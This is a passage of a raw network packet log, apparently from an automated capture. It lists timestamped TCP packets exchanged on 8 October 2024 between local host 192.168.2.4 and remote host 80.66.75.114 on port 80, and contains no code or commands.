                                                            Oct 8, 2024 10:08:38.700171947 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700187922 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700206041 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700227976 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700239897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700287104 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700287104 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.755109072 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.755125046 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.755141973 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.755179882 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.892496109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892568111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892605066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892638922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892673969 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892709970 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892733097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.892733097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.892745018 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892782927 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892803907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.892888069 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893011093 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893049955 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893085003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893119097 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893151999 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893183947 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893210888 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893217087 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893210888 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893249989 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893281937 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893285036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893321037 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893336058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893357992 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893384933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893423080 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893456936 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893461943 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893496990 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893529892 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893543959 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893568039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893625975 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893676043 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.894263029 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.894316912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.894352913 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.894359112 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.894392014 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.894437075 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.894514084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.896080971 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.896172047 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032588959 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032634020 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032690048 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032704115 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032705069 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032723904 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032776117 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032777071 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032777071 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032810926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032826900 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032845020 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032859087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032879114 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032898903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032912016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032926083 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032946110 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032958031 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032995939 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033005953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033040047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033057928 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033073902 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033087969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033123016 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033128023 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033160925 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033178091 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033195019 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033206940 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033230066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033246994 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033274889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033364058 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033413887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033416033 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033449888 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033462048 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033483982 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033500910 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033518076 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033535957 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033550978 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033565998 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033586979 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033601046 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033623934 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033637047 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033687115 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033940077 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033972979 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034003019 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034009933 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034023046 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034063101 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034110069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034142971 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034158945 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034178972 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034193993 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034212112 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034229040 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034245968 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034256935 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034296989 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034477949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034532070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034532070 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034567118 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034580946 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034617901 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166059971 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166095972 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166130066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166209936 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166217089 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166284084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166321039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166340113 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166354895 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166405916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166424036 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166438103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166471958 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166505098 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166511059 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166557074 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166601896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166634083 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166639090 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166666031 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166687965 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166698933 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166732073 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166750908 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166768074 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166800022 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166832924 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166848898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166917086 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167227030 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167260885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167296886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167314053 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167371988 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167406082 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167448044 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167479992 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167556047 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167620897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167660952 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167695045 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167704105 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167726994 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167776108 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167784929 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167808056 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167840958 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167867899 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167872906 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167907953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167922020 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167990923 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.168118000 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.168149948 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.168183088 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.168198109 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.168278933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.300610065 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.300736904 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.300750971 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.300781012 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.300803900 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.300816059 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.300841093 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.300849915 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.300863981 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.300900936 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.300900936 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.300937891 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.300956011 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.300970078 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301006079 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301004887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301027060 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301038980 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301058054 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301071882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301093102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301109076 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301131964 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301172972 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301398039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301430941 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301462889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301465988 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301484108 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301500082 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301521063 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301533937 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301554918 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301632881 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302145004 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302177906 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302210093 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302213907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302234888 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302244902 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302253008 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302294016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302294016 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997693062 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997713089 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997742891 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997745991 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997781038 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997796059 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997831106 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997832060 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997867107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997880936 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997899055 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997919083 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997932911 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.997941971 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997982025 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.997983932 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998034000 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998035908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998069048 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998086929 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998107910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998116016 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998140097 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998157024 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998172998 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998186111 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998205900 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998220921 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998239994 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998259068 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998276949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998290062 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998328924 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998651028 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998682976 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998716116 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998720884 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998722076 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998748064 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998763084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998781919 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998797894 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998814106 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998828888 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998847961 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998863935 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998879910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998898029 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998913050 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.998929024 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.998960972 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.999675989 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.999732971 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.999747038 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.999768019 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.999784946 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.999800920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.999819994 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.999836922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.999854088 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.999887943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133361101 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133433104 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133469105 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133502007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133536100 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133579969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133579969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133579969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133579969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133630991 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133660078 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133667946 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133682966 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133702040 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133714914 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133735895 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133764029 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133771896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133783102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133810043 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.133826971 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.133856058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.135819912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.135875940 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.135910034 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136003017 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136073112 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136125088 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136132002 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136159897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136177063 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136194944 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136213064 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136229038 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136244059 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136277914 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136280060 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136313915 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136329889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136347055 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136364937 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136382103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136398077 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136415005 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136434078 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136464119 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136467934 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136501074 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:41.136518002 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:41.136534929 CEST804973080.66.75.114192.168.2.4
